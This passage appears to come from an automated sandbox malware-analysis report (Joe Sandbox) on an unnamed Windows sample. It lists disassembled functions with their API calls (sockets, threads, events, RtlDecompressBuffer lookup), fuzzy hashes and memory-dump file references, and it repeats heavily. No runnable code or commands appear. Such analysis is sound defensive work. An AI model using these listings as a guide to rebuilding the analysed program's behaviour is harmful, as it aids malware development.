                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                                                                            • String ID:
                                                                            • API String ID: 2550598358-0
                                                                            • Opcode ID: 523c218f5f5a70a9ef6a6c5723bd44c62c8d4a88217d473316d5653a66c79189
                                                                            • Instruction ID: 5e615e7b86b7e84528f5c59e5ce48d49ff596080ee0292cbc10b90cea6705fdf
                                                                            • Opcode Fuzzy Hash: 523c218f5f5a70a9ef6a6c5723bd44c62c8d4a88217d473316d5653a66c79189
                                                                            • Instruction Fuzzy Hash: 94214D75A00208FBCB14DFE4DC49FAEB775FB48700F108555F516A72D0DA38AA41CB54
                                                                            Function 007E109F Relevance: 10.6, APIs: 7, Instructions: 51synchronizationsleepmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007E10EA
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007E1149
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E117D
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E11A0
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007E11B8
                                                                            • Sleep.KERNEL32(00000BB8), ref: 007E11D1
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E11EB
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E1203
                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 007E126B
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007E1281
                                                                            • LocalAlloc.KERNEL32(00000040,00000004), ref: 007E1298
                                                                            • CreateThread.KERNEL32(00000000,00000000,007E1580,00000000,00000000,00000000), ref: 007E12C4
                                                                            • GetTickCount.KERNEL32 ref: 007E12E1
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E1309
                                                                            • shutdown.WS2_32(00000000,00000002), ref: 007E13D7
                                                                            • closesocket.WS2_32(00000000), ref: 007E13E1
                                                                            • SetEvent.KERNEL32(00000000), ref: 007E13F2
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007E13FE
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1419
                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 007E14D7
                                                                            • SetEvent.KERNEL32(00000000), ref: 007E14E8
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007E14F4
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1504
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E151B
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1534
                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 007E154E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1558
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1568
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1572
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$CloseHandle$Event$Create$AllocCountLocalMutexReleaseSleepThreadTickclosesocketsetsockoptshutdown
                                                                            • String ID:
                                                                            • API String ID: 2693238558-0
                                                                            • Opcode ID: 48f419d885d60143a0f423bc19ded478ab8114b16e3291fc550c30756ca256bc
                                                                            • Instruction ID: 6c5ca28043ac7474db8266914e70f2f13ed212be7fe291a743bb6b06c9ec8d6b
                                                                            • Opcode Fuzzy Hash: 48f419d885d60143a0f423bc19ded478ab8114b16e3291fc550c30756ca256bc
                                                                            • Instruction Fuzzy Hash: 06115B75901348DBDB14CFA1EC4EBAE7771BB88305F60C908E102A62A0CB7D8944CF98
                                                                            Function 007CFA30 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 007CFA3E
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007CFA61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Module$FileHandleName
                                                                            • String ID: KERNEL32.DLL$USER32.DLL
                                                                            • API String ID: 4146042529-2880226457
                                                                            • Opcode ID: 5f6b62c3520ae90988879504e1c5570965f7819e6fd4c0bc741cb479d668d63f
                                                                            • Instruction ID: 5a26c832bab98d987a7ae00b9441ba0f54fdcbce904aefcc38c317abe86e13e7
                                                                            • Opcode Fuzzy Hash: 5f6b62c3520ae90988879504e1c5570965f7819e6fd4c0bc741cb479d668d63f
                                                                            • Instruction Fuzzy Hash: F7014471B45219EBD710EB708C48FBDB7B5A719704F1084BCE90ED2140E7BC8A84DA65
                                                                            Function 007E8091 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,007FA5D0,00000008,007E8199,00000000,00000000,?,?,007E72E3,007E46A2,?,?,007C5B93,?), ref: 007E80A2
                                                                            • __lock.LIBCMT ref: 007E80D6
                                                                              • Part of subcall function 007EC725: __mtinitlocknum.LIBCMT ref: 007EC73B
                                                                              • Part of subcall function 007EC725: __amsg_exit.LIBCMT ref: 007EC747
                                                                              • Part of subcall function 007EC725: EnterCriticalSection.KERNEL32(007C5B93,007C5B93,?,007E80DB,0000000D,?,?,007E72E3,007E46A2,?,?,007C5B93,?), ref: 007EC74F
                                                                            • InterlockedIncrement.KERNEL32(888D8B31), ref: 007E80E3
                                                                            • __lock.LIBCMT ref: 007E80F7
                                                                            • ___addlocaleref.LIBCMT ref: 007E8115
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                            • String ID: KERNEL32.DLL
                                                                            • API String ID: 637971194-2576044830
                                                                            • Opcode ID: 374e3c375280705b52b0bdcbbc8f86f4a43ce7a976f4ce9d1a0d9aac057b2bde
                                                                            • Instruction ID: 8a29d9fcc77360a1d1b8e8d28748e7fa5c494cfe86ffa08a1ee4fa2982f48f8f
                                                                            • Opcode Fuzzy Hash: 374e3c375280705b52b0bdcbbc8f86f4a43ce7a976f4ce9d1a0d9aac057b2bde
                                                                            • Instruction Fuzzy Hash: 2501A1B1506748EED7209F66D80931AFBF0EF44320F10890EE5D9533A0CBB8A945CB16
                                                                            Function 007C6010 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 007C602B
                                                                            • GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 007C603D
                                                                            • GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 007C6051
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                            • API String ID: 667068680-2897241497
                                                                            • Opcode ID: 800a1bcddb89a1fdc8bf3a56971b3e4a3da765238bf1f8f320203a73c0fe8a37
                                                                            • Instruction ID: 41045d706ae9f6976a250f624c4b2c2a87329acd5786c0e080e2746318c5216f
                                                                            • Opcode Fuzzy Hash: 800a1bcddb89a1fdc8bf3a56971b3e4a3da765238bf1f8f320203a73c0fe8a37
                                                                            • Instruction Fuzzy Hash: 9BF0FFF5511208EFCB249FA0EC8EF79B774F784321F10895DA901622A1DB7949C1DF51
                                                                            Function 007C6850 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(NTDLL.DLL,?,?,007DBC23), ref: 007C6859
                                                                            • GetProcAddress.KERNEL32(007DBC23,RtlDecompressBuffer), ref: 007C686B
                                                                            • GetProcAddress.KERNEL32(007DBC23,RtlGetCompressionWorkSpaceSize), ref: 007C687F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: NTDLL.DLL$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize
                                                                            • API String ID: 667068680-1459209654
                                                                            • Opcode ID: 17a6cc2fe5c7ee6b0b03db8ffd4f3c30f10539760c417f2a010b30d51e4b4c72
                                                                            • Instruction ID: 32161cb0dfa2511bd4bbd2d255f21b0bf0e4266b0a2ea733b4cca83e70e71edc
                                                                            • Opcode Fuzzy Hash: 17a6cc2fe5c7ee6b0b03db8ffd4f3c30f10539760c417f2a010b30d51e4b4c72
                                                                            • Instruction Fuzzy Hash: 6FF08275519308EFDF14CBA4EC0AB79B7B4F744311F00499EA900922A2D77D8D81DB51
                                                                            Function 007E7665 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __CreateFrameInfo.LIBCMT ref: 007E768D
                                                                              • Part of subcall function 007E39A8: __getptd.LIBCMT ref: 007E39B6
                                                                              • Part of subcall function 007E39A8: __getptd.LIBCMT ref: 007E39C4
                                                                            • __getptd.LIBCMT ref: 007E7697
                                                                              • Part of subcall function 007E81BE: __getptd_noexit.LIBCMT ref: 007E81C1
                                                                              • Part of subcall function 007E81BE: __amsg_exit.LIBCMT ref: 007E81CE
                                                                            • __getptd.LIBCMT ref: 007E76A5
                                                                            • __getptd.LIBCMT ref: 007E76B3
                                                                            • __getptd.LIBCMT ref: 007E76BE
                                                                            • _CallCatchBlock2.LIBCMT ref: 007E76E4
                                                                              • Part of subcall function 007E3A4D: __CallSettingFrame@12.LIBCMT ref: 007E3A99
                                                                              • Part of subcall function 007E778B: __getptd.LIBCMT ref: 007E779A
                                                                              • Part of subcall function 007E778B: __getptd.LIBCMT ref: 007E77A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1602911419-0
                                                                            • Opcode ID: 268bc153346f674cebeeed6a4c0aa1eae2703ea6438f0b4cd12614e87e32691e
                                                                            • Instruction ID: 7a41e3480dfc47cc66fdac051f608149b4ff22121b32a2de4741366f93873cbc
                                                                            • Opcode Fuzzy Hash: 268bc153346f674cebeeed6a4c0aa1eae2703ea6438f0b4cd12614e87e32691e
                                                                            • Instruction Fuzzy Hash: CF1107B1C05349EFDB00EFA5C849AAE7BB1FF08310F108069F864A7351DB389A119F51
                                                                            Function 007E8B5A Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 007E8B66
                                                                              • Part of subcall function 007E81BE: __getptd_noexit.LIBCMT ref: 007E81C1
                                                                              • Part of subcall function 007E81BE: __amsg_exit.LIBCMT ref: 007E81CE
                                                                            • __amsg_exit.LIBCMT ref: 007E8B86
                                                                            • __lock.LIBCMT ref: 007E8B96
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 007E8BB3
                                                                            • _free.LIBCMT ref: 007E8BC6
                                                                            • InterlockedIncrement.KERNEL32(024B1688), ref: 007E8BDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                            • String ID:
                                                                            • API String ID: 3470314060-0
                                                                            • Opcode ID: ab6229d9f2fbb6bb8f6f4f44497f9e0bf8fe62d3734c7325bb8c8d20d6d878cf
                                                                            • Instruction ID: 93e5a94d8c87a54437b6d1b8d624682903fbc99a4b012af577204fd9b83cc986
                                                                            • Opcode Fuzzy Hash: ab6229d9f2fbb6bb8f6f4f44497f9e0bf8fe62d3734c7325bb8c8d20d6d878cf
                                                                            • Instruction Fuzzy Hash: C8019BF2903795D7D795AB669849B5E7B60BF4C720F084005E444A7291DF3C9C41CBD7
                                                                            Function 007C90ED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C9164
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C919C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C91D2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C9222
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C928C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                            • String ID: d
                                                                            • API String ID: 971639600-2564639436
                                                                            • Opcode ID: fa3d63cbbfcf4ec25e746f5555b244587585ab14c6331ed591d524b921192b1c
                                                                            • Instruction ID: 9ace37559eceae54137e8ea3e946afe1c18b6c4a6fede3279e43eca7b17029fc
                                                                            • Opcode Fuzzy Hash: fa3d63cbbfcf4ec25e746f5555b244587585ab14c6331ed591d524b921192b1c
                                                                            • Instruction Fuzzy Hash: C8313C716009199BFB18CF88C5D9B7EB772FBD0309F14826CD1166FA95C639AA81CB41
                                                                            Function 007C6F94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C702F
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C7073
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C70B5
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C7117
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C71A5
                                                                            • shutdown.WS2_32(?,00000002), ref: 007C723B
                                                                            • closesocket.WS2_32(?), ref: 007C7245
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWaitclosesocketshutdown
                                                                            • String ID: d
                                                                            • API String ID: 1024630845-2564639436
                                                                            • Opcode ID: 7afec02a62797f5802358642953a27d801382d607906bda5a7073fdf26fe6865
                                                                            • Instruction ID: ad53c287f8dad2e29b4d2661cee6b208a0c05ba73bc37f9bcdb171fd93fa01e9
                                                                            • Opcode Fuzzy Hash: 7afec02a62797f5802358642953a27d801382d607906bda5a7073fdf26fe6865
                                                                            • Instruction Fuzzy Hash: 4241AB71A005248FFB28CE28C895F69B772FBD0309F1482EDD01EAE596C635AD95CF40
                                                                            Function 007C9121 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C9164
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C919C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C91D2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C9222
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C928C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                            • String ID: d
                                                                            • API String ID: 971639600-2564639436
                                                                            • Opcode ID: 58cbe6a7572e185d70088003296577ac30a6125c10305e641db2ca712b981e8d
                                                                            • Instruction ID: 87ebdbce18e785746d08494790fe1f27f1ac6f4376ee49bcf3274626272bc5b4
                                                                            • Opcode Fuzzy Hash: 58cbe6a7572e185d70088003296577ac30a6125c10305e641db2ca712b981e8d
                                                                            • Instruction Fuzzy Hash: 67311C716009199BFB28CE88C6D9A7EB772FBD0309F148268D1176FA95C635E941CB41
                                                                            Function 007C6FD7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C702F
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C7073
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C70B5
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C7117
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C71A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
